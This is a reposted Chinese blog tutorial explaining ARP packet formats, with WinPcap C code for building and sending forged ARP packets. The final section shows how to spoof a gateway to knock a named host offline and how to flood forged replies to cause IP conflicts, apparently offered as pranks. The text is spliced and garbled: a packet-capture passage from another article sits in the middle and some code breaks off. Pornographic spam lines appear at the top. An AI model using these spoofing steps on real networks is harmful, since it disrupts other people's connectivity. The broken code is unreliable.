Xx性欧美肥妇精品久久久久久,MM131亚洲国产美女久久,人妻少妇精品久久

山寨：不是最好的，是最適合我們的！歡迎體驗(yàn)山寨 中文版MSDN

ARP協(xié)議詳解及如何編程實(shí)現(xiàn)ARP攻擊[轉(zhuǎn)]

一． 關(guān)于ARP協(xié)議的基礎(chǔ)知識(shí)

1．ARP的工作原理

我們都知道以太網(wǎng)設(shè)備比如網(wǎng)卡都有自己全球唯一的MAC地址，它們是以MAC地址來傳輸以太網(wǎng)數(shù)據(jù)包的，但是它們卻識(shí)別不了我們IP包中的IP地址，所以我們?cè)谝蕴W(wǎng)中進(jìn)行IP通信的時(shí)候就需要一個(gè)協(xié)議來建立IP地址與MAC地址的對(duì)應(yīng)關(guān)系，以使IP數(shù)據(jù)包能發(fā)到一個(gè)確定的地方去。這就是ARP(Address Resolution Protocol，地址解析協(xié)議)。

講到此處，我們可以在命令行窗口中，輸入

arp –a

來看一下效果，類似于這樣的條目

210.118.45.100 00-0b-5f-e6-c5-d7 dynamic

就是我們電腦里存儲(chǔ)的關(guān)于IP地址與MAC地址的對(duì)應(yīng)關(guān)系，dynamic表示是臨時(shí)存儲(chǔ)在ARP緩存中的條目，過一段時(shí)間就會(huì)超時(shí)被刪除(xp/2003系統(tǒng)是2分鐘)。

這樣一來，比如我們的電腦要和一臺(tái)機(jī)器比如210.118.45.1通信的時(shí)候，它會(huì)首先去檢查arp緩存，查找是否有對(duì)應(yīng)的arp條目，如果沒有，它就會(huì)給這個(gè)以太網(wǎng)絡(luò)發(fā)ARP請(qǐng)求包廣播詢問210.118.45.1的對(duì)應(yīng)MAC地址，當(dāng)然，網(wǎng)絡(luò)中每臺(tái)電腦都會(huì)收到這個(gè)請(qǐng)求包，但是它們發(fā)現(xiàn)210.118.45.1并非自己，就不會(huì)做出相應(yīng)，而210.118.45.1就會(huì)給我們的電腦回復(fù)一個(gè)ARP應(yīng)答包，告訴我們它的MAC地址是xx-xx-xx-xx-xx-xx,于是我們電腦的ARP緩存就會(huì)相應(yīng)刷新,多了這么一條：

210.118.45.1 xx-xx-xx-xx-xx-xx dynamic

為什么要有這么一個(gè)ARP緩存呢，試想一下如果沒有緩存，我們每發(fā)一個(gè)IP包都要發(fā)個(gè)廣播查詢地址，豈不是又浪費(fèi)帶寬又浪費(fèi)資源？

而且我們的網(wǎng)絡(luò)設(shè)備是無法識(shí)別ARP包的真?zhèn)蔚模绻覀儼凑誂RP的格式來發(fā)送數(shù)據(jù)包，只要信息有效計(jì)算機(jī)就會(huì)根據(jù)包中的內(nèi)容做相應(yīng)的反應(yīng).

試想一下,如果我們按照ARP響應(yīng)包的相應(yīng)的內(nèi)容來刷新自己的ARP緩存中的列表，嘿嘿，那我們豈不是可以根據(jù)這點(diǎn)在沒有安全防范的網(wǎng)絡(luò)中玩些ARP包的小把戲了？在后面的文章里我就手把手來教你們?nèi)绾翁畛浒l(fā)送ARP包，不過先別急，我們?cè)倮^續(xù)學(xué)點(diǎn)基礎(chǔ)知識(shí)^_^

2．ARP包的格式

既然我們要來做一個(gè)我們自己的ARP包，當(dāng)然首先要學(xué)習(xí)一下ARP包的格式。

從網(wǎng)絡(luò)底層看來，一個(gè)ARP包是分為兩個(gè)部分的，前面一個(gè)是物理幀頭，后面一個(gè)才是ARP幀。

首先，物理幀頭，它將存在于任何一個(gè)協(xié)議數(shù)據(jù)包的前面，我們稱之為DLC Header，因?yàn)檫@個(gè)幀頭是在數(shù)據(jù)鏈路層構(gòu)造的，并且其主要內(nèi)容為收發(fā)雙方的物理地址，以便硬件設(shè)備識(shí)別。

DLC Header
字段	長(zhǎng)度(Byte)	默認(rèn)值	備注
接收方MAC	6		廣播時(shí),為 ff-ff-ff-ff-ff-ff
發(fā)送方MAC	6
Ethertype	2	0x0806	0x0806是ARP幀的類型值

圖1 物理幀頭格式

圖1是需要我們填充的物理幀頭的格式,我們可以看到需要我們填充的僅僅是發(fā)送端和接收端的物理地址罷了,是不是很簡(jiǎn)單呢?

接下來我們看一下ARP幀的格式.

ARP Frame
字段	長(zhǎng)度(Byte)	默認(rèn)值	備注
硬件類型	2	0x1	以太網(wǎng)類型值
上層協(xié)議類型	2	0x0800	上層協(xié)議為IP協(xié)議
MAC地址長(zhǎng)度	1	0x6	以太網(wǎng)MAC地址長(zhǎng)度為 6
IP地址長(zhǎng)度	1	0x4	IP地址長(zhǎng)度為 4
操作碼	2		0x1表示ARP請(qǐng)求包,0x2表示應(yīng)答包
發(fā)送方MAC	6
發(fā)送方IP	4
接收方MAC	6
接收方IP	4
填充數(shù)據(jù)	18		因?yàn)槲锢韼钚￠L(zhǎng)度為64字節(jié),前面的42字節(jié)再加上4個(gè)CRC校驗(yàn)字節(jié),還差18個(gè)字節(jié)

圖2 ARP幀格式

我們可以看到需要我們填充的同樣也只是MAC,IP,再加上一個(gè)1或2的操作碼而已。

3.ARP包的填充

1) 請(qǐng)求包的填充：

比如我們的電腦MAC地址為 aa-aa-aa-aa-aa-aa，IP為 192.168.0.1

我們想要查詢 192.168.0.99的MAC地址，應(yīng)該怎么來做呢？

首先填充DLC Header，通過前面的學(xué)習(xí)我們知道，想要知道某個(gè)計(jì)算機(jī)對(duì)應(yīng)的MAC地址是要給全網(wǎng)發(fā)送廣播的，所以接收方MAC肯定是 ffffffffffff，發(fā)送方MAC當(dāng)然是自己啦，于是我們的DLC Header就填充完成了，如圖，加粗的是我們要手動(dòng)輸入的值(當(dāng)然我編的程序比較智能，會(huì)根據(jù)你選擇的ARP包類型幫你自動(dòng)填入一些字段，你一用便知^_^)。

DLC Header
字段	長(zhǎng)度(Byte)	填充值
接收方MAC	6	ffffffffffff
發(fā)送方MAC	6	aaaaaaaaaaaa
Ethertype	2	0x0806

圖3 ARP請(qǐng)求包中 DLC Header內(nèi)容

接下來是ARP幀，請(qǐng)求包的操作碼當(dāng)然是 1,發(fā)送方的MAC以及IP當(dāng)然填入我們自己的，然后要注意一下，這里的接收方IP填入我們要查詢的那個(gè)IP地址，就是192.168.0.99了，而接收方MAC填入任意值就行，不起作用，于是，如圖，

ARP Frame
字段	長(zhǎng)度(Byte)	填充值
硬件類型	2	1
上層協(xié)議類型	2	0800
MAC地址長(zhǎng)度	1	6
IP地址長(zhǎng)度	1	4
操作碼	2	1
發(fā)送方MAC	6	aaaaaaaaaaaa
發(fā)送方IP	4	192.168.0.1
接收方MAC	6	任意值 xxxxxxxxxxxx
接收方IP	4	192.168.0.99
填充數(shù)據(jù)	18	0

圖4 ARP請(qǐng)求包中 ARP幀的內(nèi)容

如果我們構(gòu)造一個(gè)這樣的包發(fā)送出去，如果 192.168.0.99存在且是活動(dòng)的，我們馬上就會(huì)收到一個(gè)192.168.0.99發(fā)來的一個(gè)響應(yīng)包，我們可以查看一下我們的ARP緩存列表，是不是多了一項(xiàng)類似這樣的條目：

192.168.0.99 bb-bb-bb-bb-bb-bb

是不是很神奇呢？

我們?cè)賮砜匆幌翧RP響應(yīng)包的構(gòu)造

2) 響應(yīng)包的填充

有了前面詳細(xì)的解說，你肯定就能自己說出響應(yīng)包的填充方法來了吧，所以我就不細(xì)說了，列兩個(gè)表就好了

比如說給 192.168.0.99（MAC為 bb-bb-bb-bb-bb-bb）發(fā)一個(gè)ARP響應(yīng)包，告訴它我們的MAC地址為 aa-aa-aa-aa-aa-aa，就是如此來填充各個(gè)字段

DLC Header
字段	長(zhǎng)度(Byte)	填充值
接收方MAC	6	bbbbbbbbbbbb
發(fā)送方MAC	6	aaaaaaaaaaaa
Ethertype	2	0x0806

圖5 ARP響應(yīng)包中 DLC Header內(nèi)容

ARP Frame
字段	長(zhǎng)度(Byte)	填充值
硬件類型	2	1
上層協(xié)議類型	2	0800
MAC地址長(zhǎng)度	1	6
IP地址長(zhǎng)度	1	4
操作碼	2	2
發(fā)送方MAC	6	aaaaaaaaaaaa
發(fā)送方IP	4	192.168.0.1
接收方MAC	6	bbbbbbbbbbbb
接收方IP	4	192.168.0.99
填充數(shù)據(jù)	18	0

圖6 ARP響應(yīng)包中 ARP幀的內(nèi)容

這樣192.168.0.99的ARP緩存中就會(huì)多了一條關(guān)于我們192.168.0.1的地址映射。

好了，終于到了編程實(shí)現(xiàn)它的時(shí)候了^_^

我們主要是要用到 pcap_open_live 函數(shù)，不過這個(gè)函數(shù)winpcap的開發(fā)小組已經(jīng)建議用 pcap_open 函數(shù)來代替，不過因?yàn)槲业拇a里面用的就是pcap_open_live，所以也不便于修改了，不過pcap_open_live使用起來也是沒有任何問題的，下面是pcap_open_live的函數(shù)聲明：
/*************************************************
pcap_t* pcap_open_live  (  char *    device,
                             int    snaplen,
  int    promisc,
  int    to_ms,
  char *    ebuf
)
     功能：
           根據(jù)網(wǎng)卡名字打開網(wǎng)卡，并設(shè)置為混雜模式，然后返回其句柄
     參數(shù)：
           Device  : 就是前前面我們獲得的網(wǎng)卡的名字；
           Snaplen :  我們從每個(gè)數(shù)據(jù)包里取得數(shù)據(jù)的長(zhǎng)度，比如設(shè)置為100，則每次我們只是獲得每個(gè)數(shù)據(jù)包 100 個(gè)長(zhǎng)度的數(shù)據(jù)，沒有什么特殊需求的話就把它設(shè)置為65535最大值就可以了；
           Promisc：這個(gè)參數(shù)就是設(shè)置是否把網(wǎng)卡設(shè)置為“混雜模式”，設(shè)置為 1 即可；
           to_ms :   超時(shí)時(shí)間，毫秒，一般設(shè)置為 1000即可。
     返回值：
           pcap_t :  類似于一個(gè)網(wǎng)卡“句柄”之類的，不過當(dāng)然不是，這個(gè)參數(shù)是后面截獲數(shù)據(jù)要用到的。
******************************************************************************/
雖然看起來比較復(fù)雜，不過用起來還是非常簡(jiǎn)單的，其實(shí) 1 行就OK了：
    pcap_t* adhandle;
       char errbuf[PCAP_ERRBUF_SIZE];
// 打開網(wǎng)卡，并且設(shè)置為混雜模式
// pCardName是前面?zhèn)鱽淼木W(wǎng)卡名字參數(shù)
adhandle = pcap_open_live(pCardName,65535,1,1000,errbuf);

C. 截獲數(shù)據(jù)包并保存為文件：------------------------------------------------------
     當(dāng)然，不把數(shù)據(jù)包保存為文件也可以，不過如果不保存的話，只能在截獲到數(shù)據(jù)包的那一瞬間進(jìn)行分析，轉(zhuǎn)眼就沒了^_^
所以，為了便于日后分析，所以高手以及我個(gè)人經(jīng)常是把數(shù)據(jù)包保存下來的慢慢分析的。
但是注意網(wǎng)絡(luò)流量，在流量非常大的時(shí)候注意硬盤空間呵呵，常常幾秒中就有好幾兆是很正常的事情。
下面首先來詳細(xì)講解一下，這個(gè)步驟中需要用到的winpcap函數(shù)：
/**************************************************************
pcap_dumper_t* pcap_dump_open  (  pcap_t *    p,
                                      const char *    fname
)
功能：
      建立或者打開存儲(chǔ)數(shù)據(jù)包內(nèi)容的文件,并返回其句柄
參數(shù)：
       pcap_t *    p     ：前面打開的網(wǎng)卡句柄；
      const char * fname ：要保存的文件名字
返回值：
       pcap_dumper_t* ：保存文件的描述句柄，具體細(xì)節(jié)我們不用關(guān)心
***************************************************************/
/***************************************************************
int pcap_next_ex          (  pcap_t *    p,
                              struct pcap_pkthdr **    pkt_header,
  u_char **    pkt_data
)
功能：
      從網(wǎng)卡或者數(shù)據(jù)包文件中讀取數(shù)據(jù)內(nèi)容
參數(shù)：
      pcap_t *    p:    網(wǎng)卡句柄
      struct pcap_pkthdr ** pkt_header: 并非是數(shù)據(jù)包的指針，只是與數(shù)據(jù)包捕獲驅(qū)動(dòng)有關(guān)的一個(gè)Header
      u_char ** pkt_data：指向數(shù)據(jù)包內(nèi)容的指針，包括了協(xié)議頭
返回值：
          1 : 如果成功讀取數(shù)據(jù)包
          0 ：pcap_open_live()設(shè)定的超時(shí)時(shí)間之內(nèi)沒有讀取到內(nèi)容
          -1: 出現(xiàn)錯(cuò)誤
          -2: 讀文件時(shí)讀到了末尾
***************************************************************/
/***************************************************************
void pcap_dump  (  u_char *    user,
                       const struct pcap_pkthdr *    h,
  const u_char *    sp
)
功能：
      將數(shù)據(jù)包內(nèi)容依次寫入pcap_dump_open（）指定的文件中
參數(shù)：
      u_char * user   :  網(wǎng)卡句柄
      const struct pcap_pkthdr * h: 并非是數(shù)據(jù)包的指針，只是與數(shù)據(jù)包捕獲驅(qū)動(dòng)有關(guān)的一個(gè)Header
      const u_char * sp：數(shù)據(jù)包內(nèi)容指針
返回值：
          Void
****************************************************************/
下面給出一段完整的捕獲數(shù)據(jù)包的代碼，是在線程中寫的，為了程序清晰，我去掉了錯(cuò)誤處理代碼以及線程退出的代碼，完整代碼可下載文后的示例源碼，老規(guī)矩，重要的步驟用粗體字標(biāo)出。
我們實(shí)際在捕獲數(shù)據(jù)包的時(shí)候也最好是把代碼放到另外的線程中。
/*********************************************************
*   進(jìn)程:
*                   這個(gè)是程序的核心部分，完成數(shù)據(jù)包的截獲
*     參數(shù):
*                   pParam: 用戶選擇的用來捕獲數(shù)據(jù)的網(wǎng)卡的名字
*********************************************************/
UINT CaptureThread(LPVOID pParam)
{
       const char* pCardName=(char*)pParam;          // 轉(zhuǎn)換參數(shù)，獲得網(wǎng)卡名字

       pcap_t* adhandle;
       char errbuf[PCAP_ERRBUF_SIZE];
       // 打開網(wǎng)卡，并且設(shè)置為混雜模式
adhandle=pcap_open_live(pCardName,65535,1,1000,errbuf)；      {

       pcap_dumper_t* dumpfile;
// 建立存儲(chǔ)截獲數(shù)據(jù)包的文件
       dumpfile=pcap_dump_open(adhandle, "Packet.dat");

       int re;
       pcap_pkthdr* header;      // Header
       u_char* pkt_data;         // 數(shù)據(jù)包內(nèi)容指針
// 從網(wǎng)卡或者文件中不停讀取數(shù)據(jù)包信息
       while((re=pcap_next_ex(adhandle,&header,(const u_char**)&pkt_data))>=0)
      {
          // 將捕獲的數(shù)據(jù)包存入文件
              pcap_dump((unsigned char*)dumpfile,header,pkt_data);
       }
       return 0;
}
將個(gè)線程加入到程序里面啟動(dòng)以后。。。等等，如何來啟動(dòng)這個(gè)線程就不用我說了吧，類似這樣的代碼就可以
::AfxBeginThread(CaptureThread,chNIC);     // chNIC是網(wǎng)卡的名字,char* 類型
啟動(dòng)線程一段時(shí)間以后(幾秒中就有效果了)，可以看到數(shù)據(jù)包已經(jīng)被成功的截獲下來，并存儲(chǔ)到程序目錄下的Packet.dat文件中。
=====================================================
至此，數(shù)據(jù)包的截獲方法就講完了，大家看了這篇文章，其實(shí)你就一定也明白了，無論是raw socket的方法還是winpcap的方法，其實(shí)都很簡(jiǎn)單的，真的沒有什么東西，只是會(huì)讓不明白原理的人看起來很神秘而已，isn’t it?
呵呵，不過也不要高興的太早，這個(gè)保存下來的數(shù)據(jù)包文件，你可以試著用UltraEdit打開這個(gè)文件看看，是不是大部分都是亂碼？基本上沒有什么可讀性，這是因?yàn)椋?
此時(shí)捕獲到的數(shù)據(jù)包并不僅僅是單純的數(shù)據(jù)信息，而是包含有 IP頭、 TCP頭等信息頭的最原始的數(shù)據(jù)信息，這些信息保留了它在網(wǎng)絡(luò)傳輸時(shí)的原貌。通過對(duì)這些在低層傳輸?shù)脑夹畔⒌姆治隹梢缘玫接嘘P(guān)網(wǎng)絡(luò)的一些信息。由于這些數(shù)據(jù)經(jīng)過了網(wǎng)絡(luò)層和傳輸層的打包，因此需要根據(jù)其附加的幀頭對(duì)數(shù)據(jù)包進(jìn)行分析。
呵呵，所以我們要走的路還很長(zhǎng)，這只是剛剛?cè)腴T而已^_^

二．發(fā)送ARP包的編程實(shí)現(xiàn)

1. 填充數(shù)據(jù)包

上面的那些關(guān)于ARP包各個(gè)字段的表格，對(duì)應(yīng)在程序里就是結(jié)構(gòu)體，對(duì)應(yīng)于上面的表格，于是我們需要三個(gè)下面這樣的結(jié)構(gòu)體

// DLC Header

typedef struct tagDLCHeader

{

unsigned char DesMAC[6]; /* destination HW addrress */

unsigned char SrcMAC[6]; /* source HW addresss */

unsigned short Ethertype; /* ethernet type */

} DLCHEADER, *PDLCHEADER;

// ARP Frame

typedef struct tagARPFrame

{

unsigned short HW_Type; /* hardware address */

unsigned short Prot_Type; /* protocol address */

unsigned char HW_Addr_Len; /* length of hardware address */

unsigned char Prot_Addr_Len; /* length of protocol address */

unsigned short Opcode; /* ARP/RARP */

unsigned char Send_HW_Addr[6]; /* sender hardware address */

unsigned long Send_Prot_Addr; /* sender protocol address */

unsigned char Targ_HW_Addr[6]; /* target hardware address */

unsigned long Targ_Prot_Addr; /* target protocol address */

unsigned char padding[18];

} ARPFRAME, *PARPFRAME;

// ARP Packet = DLC header + ARP Frame

typedef struct tagARPPacket

{

DLCHEADER dlcHeader;

ARPFRAME arpFrame;

} ARPPACKET, *PARPPACKET;

這些結(jié)構(gòu)體一定能看懂吧，在程序中就是對(duì)號(hào)入座就好了

1. 填充數(shù)據(jù)包

下面我舉個(gè)填充包頭的例子，我首先定義個(gè)了一個(gè)轉(zhuǎn)換字符的函數(shù)，如下

/****************************************************************************

* Name & Params::

* formatStrToMAC

* (

* const LPSTR lpHWAddrStr : 用戶輸入的MAC地址字符串

* unsigned char *HWAddr : 返回的MAC地址字符串(賦給數(shù)據(jù)包結(jié)構(gòu)體)

* )

* Purpose:

* 將用戶輸入的MAC地址字符轉(zhuǎn)成數(shù)據(jù)包結(jié)構(gòu)體需要的格式

****************************************************************************/

void formatStrToMAC(const LPSTR lpHWAddrStr, unsigned char *HWAddr)

{

unsigned int i, index = 0, value, temp;

unsigned char c;

_strlwr(lpHWAddrStr); // 轉(zhuǎn)換成小寫

for (i = 0; i < strlen(lpHWAddrStr); i++)

{

c = *(lpHWAddrStr + i);

if (( c>=’0’ && c<=’9’ ) || ( c>=’a’ && c<=’f’ ))

{

if (c>=’0’ && c<=’9’) temp = c - ’0’; // 數(shù)字

if (c>=’a’ && c<=’f’) temp = c - ’a’ + 0xa; // 字母

if ( (index % 2) == 1 )

{

value = value*0x10 + temp;

HWAddr[index/2] = value;

}

else value = temp;

index++;

}

if (index == 12) break;

}

// 開始填充各個(gè)字段

ARPPACKET ARPPacket; // 定義ARPPACKET結(jié)構(gòu)體變量

memset(&ARPPacket, 0, sizeof(ARPPACKET)); // 數(shù)據(jù)包初始化

formatStrToMAC(“DLC源MAC字符串”,ARPPacket.dlcHeader.SrcMAC); // DLC幀頭

formatStrToMAC(“DLC目的MAC字符串”,ARPPacket.dlcHeader.DesMAC);

formatStrToMAC(“ARP源MAC字符串”,ARPPacket.arpFrame.Send_HW_Addr); // 源MAC

ARPPacket.arpFrame.Send_Prot_Addr = inet_addr(srcIP); // 源IP

formatStrToMAC(“ARP目的MAC字符串”,ARPPacket.arpFrame.Targ_HW_Addr); // 目的MAC

ARPPacket.arpFrame.Targ_Prot_Addr = inet_addr(desIP); // 目的IP

ARPPacket.arpFrame.Opcode = htons((unsigned short)arpType); // arp包類型

// 自動(dòng)填充的常量

ARPPacket.dlcHeader.Ethertype = htons((unsigned short)0x0806); // DLC Header的以太網(wǎng)類型

ARPPacket.arpFrame.HW_Type = htons((unsigned short)1); // 硬件類型

ARPPacket.arpFrame.Prot_Type = htons((unsigned short)0x0800); // 上層協(xié)議類型

ARPPacket.arpFrame.HW_Addr_Len = (unsigned char)6; // MAC地址長(zhǎng)度

ARPPacket.arpFrame.Prot_Addr_Len = (unsigned char)4; // IP地址長(zhǎng)度

That’s all ! ^_^

填充完畢之后，我們需要做的就是把我們的ARPPACKET結(jié)構(gòu)體發(fā)送出去

2.發(fā)送ARP數(shù)據(jù)包：

我們發(fā)送ARP包就要用到winpcap的api了，具體步驟及函數(shù)是這樣的，為了簡(jiǎn)單易懂，我把錯(cuò)誤處理的地方都去掉了，詳見代碼

/**********************************************************************

* Name & Params::

* SendARPPacket()

* Purpose:

* 發(fā)送ARP數(shù)據(jù)包

* Remarks:

* 用的是winpcap的api函數(shù)

***********************************************************************/

void SendARPPacket()

{

char *AdapterDeviceName =GetCurAdapterName(); // 首先獲得獲得網(wǎng)卡名字

lpAdapter = PacketOpenAdapter(AdapterDeviceName); // 根據(jù)網(wǎng)卡名字打開網(wǎng)卡

lpPacket = PacketAllocatePacket(); // 給PACKET結(jié)構(gòu)指針分配內(nèi)存

PacketInitPacket(lpPacket, &ARPPacket, sizeof(ARPPacket)); //初始化PACKET結(jié)構(gòu)指針

// 其中的ARPPacket就是我們先前填充的ARP包

PacketSetNumWrites(lpAdapter, 1); // 每次只發(fā)送一個(gè)包

PacketSendPacket(lpAdapter, lpPacket, true) // Send !!!!! ^_^

PacketFreePacket(lpPacket); // 釋放資源

PacketCloseAdapter(lpAdapter);

}

呵呵，至此，關(guān)于ARP包最關(guān)鍵的部分就講完了，你現(xiàn)在就可以來隨心所欲的發(fā)送自己的ARP包了

既然作為一篇“科普文章”，接下來我再講一講與整個(gè)項(xiàng)目有關(guān)的附加步驟以及說明

三．附加步驟以及說明

1. 如何在VC中使用winpcap驅(qū)動(dòng)

雖然winpcap開發(fā)包使用起來非常簡(jiǎn)便，但是前期準(zhǔn)備工作還是要費(fèi)一番功夫的，缺一不可。^_^

首先就是要安裝它的驅(qū)動(dòng)程序了，可以到它的主頁(yè)下載，更新很快的

http://winpcap.polito.it/install/default.htm

下載WinPcap auto-installer (driver +DLLs)，直接安裝就好了，或者我提供的代碼包里面也有。

希望以后用winpcap作開發(fā)的朋友，還需要下載 Developer’s pack，解壓即可。

然后，需要設(shè)置我們工程的附加包含目錄為我們下載Developer’s pack開發(fā)包的Inclulde目錄，連接器的附加依賴庫(kù)設(shè)置為Developer’s pack的lib目錄。

當(dāng)然，因?yàn)槲覀兊墓ぷ鞅容^簡(jiǎn)單，就是借用winpcap發(fā)送數(shù)據(jù)包而已，所以只用從

winpcap開發(fā)包的include文件夾中，拷貝Packet32.h，到我們的工程來，并且包含它就可

以，但是要注意，Packet32.h本身還要包含一個(gè)Devioctl.h，也要一并拷貝進(jìn)來，當(dāng)然還有運(yùn)

行庫(kù)Packet.lib，一共就是需要拷貝3個(gè)文件了，如果加入庫(kù)不用我多說了吧，在工程里面設(shè)

置，或者是在需要它的地方加入 #pragma comment(lib, "Packet.lib")了。

整個(gè)項(xiàng)目其實(shí)可以分為四個(gè)部分，填充數(shù)據(jù)包、發(fā)送數(shù)據(jù)包、枚舉系統(tǒng)網(wǎng)卡列表和

相關(guān)信息以及枚舉系統(tǒng)ARP緩存列表，下面我再講一下如何獲得系統(tǒng)的網(wǎng)卡以及ARP列

表，這兩個(gè)部分都要用到IP Helper的api，所以要包含以及庫(kù)文件Iphlpapi.lib，

其實(shí)都是很簡(jiǎn)單的，只用寥寥幾行就OK了

2. 枚舉系統(tǒng)網(wǎng)卡以及信息

最好是先定義關(guān)于網(wǎng)卡信息的一個(gè)結(jié)構(gòu)體，這樣顯得結(jié)構(gòu)比較清晰

// 網(wǎng)卡信息

typedef struct tagAdapterInfo

{

char szDeviceName[128]; // 名字

char szIPAddrStr[16]; // IP

char szHWAddrStr[18]; // MAC

DWORD dwIndex; // 編號(hào)

}INFO_ADAPTER, *PINFO_ADAPTER;

/*********************************************************************

* Name & Params::

* AddAdapInfoToList

* (

* CListCtrl& list : CARPPlayerDlg傳入的list句柄

* )

* Purpose:

* 獲得系統(tǒng)的網(wǎng)卡信息，并將其添加到list控件中

* Remarks:

* 獲得網(wǎng)卡IP及MAC用到了IpHelper api GetAdaptersInfo

******************************************************************/

**************************

delete pIpNetTable;

}

這樣一來，我們基本上大功告成了，其他還有一些東西在這里就不講了，大家可以下載我的代碼看看就好了。

下面我們來用ARP包玩一些小把戲 ^_^。

四．ARP包的游戲

既然我們可以自己來填充數(shù)據(jù)包，那么來玩些ARP的“小游戲”欺騙就是易如反掌了，當(dāng)然，是在沒有安全防護(hù)的網(wǎng)絡(luò)里，比如只有hub或者交換機(jī)把你們相連，而沒有路由分段……^_^

下面我就由淺入深的講一些介紹一些關(guān)于ARP的小伎倆。

1. 小伎倆

1) 你可以試著發(fā)一個(gè)請(qǐng)求包廣播，其中的ARP幀里關(guān)于你的信息填成這樣：

(為了節(jié)省篇幅，我只寫需要特別指出的填充字段)

發(fā)送方MAC	6	隨便亂填一個(gè)錯(cuò)誤的
發(fā)送方IP	4	填上你的IP

出現(xiàn)什么結(jié)果？是不是彈出一個(gè)IP地址沖突的提示？呵呵，同樣的道理，如果發(fā)送方IP填成別人的，然后每隔1秒發(fā)一次………..-_-b

2) 比如你們都靠一個(gè)網(wǎng)關(guān)192.168.0.1 上網(wǎng) ，如果你想讓192.168.0.77 上不了網(wǎng)，就可以偽裝成網(wǎng)關(guān)給192.168.0.77發(fā)一個(gè)錯(cuò)誤的ARP響應(yīng)包, like this

發(fā)送方MAC	6	隨便亂填一個(gè)錯(cuò)誤的
發(fā)送方IP	4	網(wǎng)關(guān)IP 192.168.0.1

接收方就填192.168.0.77的相關(guān)信息，發(fā)送之后，它還能上網(wǎng)不？

這樣能折騰他好一陣子了，只要它的系統(tǒng)得不到正確的到網(wǎng)關(guān)的ARP映射表它就一直上不了網(wǎng)了

posted on 2008-05-23 10:35 isabc 閱讀(3806) 評(píng)論(0) 編輯收藏引用所屬分類: 網(wǎng)絡(luò)編程

只有注冊(cè)用戶登錄后才能發(fā)表評(píng)論。
【推薦】100%開源！大型工業(yè)跨平臺(tái)軟件C++源碼提供，建模，組態(tài)！

相關(guān)文章: IOCP簡(jiǎn)單實(shí)現(xiàn)代碼[轉(zhuǎn)] 用協(xié)議分析工具學(xué)習(xí)TCP/IP ADO之Command對(duì)象全解[轉(zhuǎn)] ARP協(xié)議詳解及如何編程實(shí)現(xiàn)ARP攻擊[轉(zhuǎn)] TCP/IP 協(xié)議的結(jié)構(gòu)與運(yùn)行原理[圖] TCP頭結(jié)構(gòu) 讓你真正了解局域網(wǎng)技術(shù)概述[轉(zhuǎn)] 實(shí)例ＩＰ　ＵＤＰ頭結(jié)構(gòu)

網(wǎng)站導(dǎo)航: 博客園 IT新聞 BlogJava 博問 Chat2DB 管理

Blog @ Blog

導(dǎo)航

公告

留言簿(20)

隨筆分類(156)

文章分類(1)

隨筆檔案(198)

文章檔案(2)

相冊(cè)

閱讀排行榜

評(píng)論排行榜

常用鏈接

統(tǒng)計(jì)

積分與排名

BBS

Blog

Web

最新評(píng)論

ARP協(xié)議詳解及如何編程實(shí)現(xiàn)ARP攻擊[轉(zhuǎn)]